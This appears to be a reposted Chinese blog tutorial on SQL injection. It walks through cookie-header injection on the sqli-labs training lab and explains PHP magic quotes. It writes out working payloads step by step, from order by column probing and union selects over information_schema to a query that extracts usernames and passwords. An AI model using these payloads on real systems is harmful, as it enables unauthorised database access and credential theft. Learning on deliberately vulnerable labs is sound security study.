sql注入型別

通過上一次的sql注入型別學習中，學習到了兩個基本的注入型別數字型注入和字符型注入，此篇文章將更加深入學習sql注入中更多的注入型別，

數字型注入
字符型注入
cookie注入

cookie注入

cookie注入學習之前，我們通過sqlilabs中我們通過Post注入和cookie注入中的第十一題與二十題的php代碼進行分析

此圖片為sqlilabs中第十一題Post注入中php代碼，通過下面圖片代碼分析，在Post注入中Post是沒有做任何的防護措施，所以注入可以通過Post注入的方式，

$ uname=$_POST[‘uname’];
$ passwd=$_POST[‘passwd’];

在這里插入圖片描述

此圖片為sqlilabs中第二十題中的php代碼，通過下面圖片對代碼進行分析
第一張圖中使用了魔術引號，所以在第二十題中Post注入無法得到生效

get_magic_quotes_gpc()

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-uLXOBHyG-1636673610393)(1_md_files%5Cimage%20%284%29.png?v=1&type=image)]

知識點擴展：魔術引號

我們通過第二十題中的php代碼來分析魔術引號，我們在第二十題php中此處加入下面一條命令來查看魔術引號的使用效果

echo $ sql;

在這里插入圖片描述

通過我們添加echo $sql查看的效果發現在Post注入時候，魔術引號就起作用了將資料庫或檔案中讀取資料時，對單引號、雙引號、反斜線、NULL加上一個反斜線進行轉義

魔術引號：通過下面三句代碼我們來分析魔術引號進行分析

”select * from ‘表名’ where field1 = $ para and field2 = ‘xxx’”
當我們在$ para中進行傳參的時候，如果我們傳入了雙引號、單引號反斜線、NULL加上一個反斜線進行轉義，
“select * from ‘表名’ where field1 = " shiyan and field2 =‘xxx’”
"select * from ‘表名’ where field1 = “shiyan and field2= ‘xxx’”

cookie注入

了解了魔術引號我們對于第二十題就不能用Post注入了，所以就回到本次筆記的內容，cookie注入，
cookie注入中我們需要用到burpsuite抓包

使用burpsuite將攔截包的intercept is off打開變為on
使用火狐瀏覽器在當前靶場第二十題中進行隨便的賬號和密碼的輸入
這時我們的burpsutie已經抓取到了靶場輸入用戶名密碼的資訊

我們抓取到了包后反擊滑鼠右鍵，然后Send to Repeater進行編輯來實作后續的注入步驟
編輯Repeater中將原本的uname=zjx&passwd=zjx&submit=Submit，復制到我們自己輸入的Cookie: 這個欄位的后面，我們進行查看
此時我們再在我輸入的用戶后方使用單引號來閉合資料并進行查看資料庫的欄位數

Cookie: uname=zjx’ order by 4#&passwd=zjx&submit=Submit

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-PsMrR3ab-1636673610401)(1_md_files%5Cimage%20%2816%29.png?v=1&type=image)]

Cookie: uname=zjx’ order by 3#&passwd=zjx&submit=Submit 將欄位改為3發現沒有報錯

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-RDkhosHF-1636673610402)(1_md_files%5Cimage%20%2818%29.png?v=1&type=image)]

我們使用union查詢來查詢一下資料回顯的位置，發現在兩處位置產生了回顯顯示，我們將2位置改為database()查詢資料庫的名稱，于是查詢到資料庫名稱
已經查詢資料庫名稱為security，使用union查詢資料庫中所有的表

Cookie: uname=zjx’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’#&passwd=zjx&submit=Submit

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-B1029xFk-1636673610403)(1_md_files%5Cimage%20%2821%29.png?v=1&type=image)]

查詢在資料庫security下有emails,referers,uagents,users表名，使用union查詢表下的欄位資訊，這里我查看的是users下的欄位資訊

Cookie: uname=zjx’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’#&passwd=zjx&submit=Submit

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-c7g262tN-1636673610404)(1_md_files%5Cimage%20%2822%29.png?v=1&type=image)]

已經知道users表下的欄位名稱，使用union命令就可以查詢資料了

Cookie: uname=zjx’ union select id,username,password from users limit 0,1#&passwd=zjx&submit=Submit

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/356725.html

標籤：其他

上一篇：魯迅先生，對不住了

下一篇：使用Fiddler對手機APP抓包滲透測驗實戰

sql注入型別之cookie注入

sql注入型別

cookie注入

知識點擴展：魔術引號

cookie注入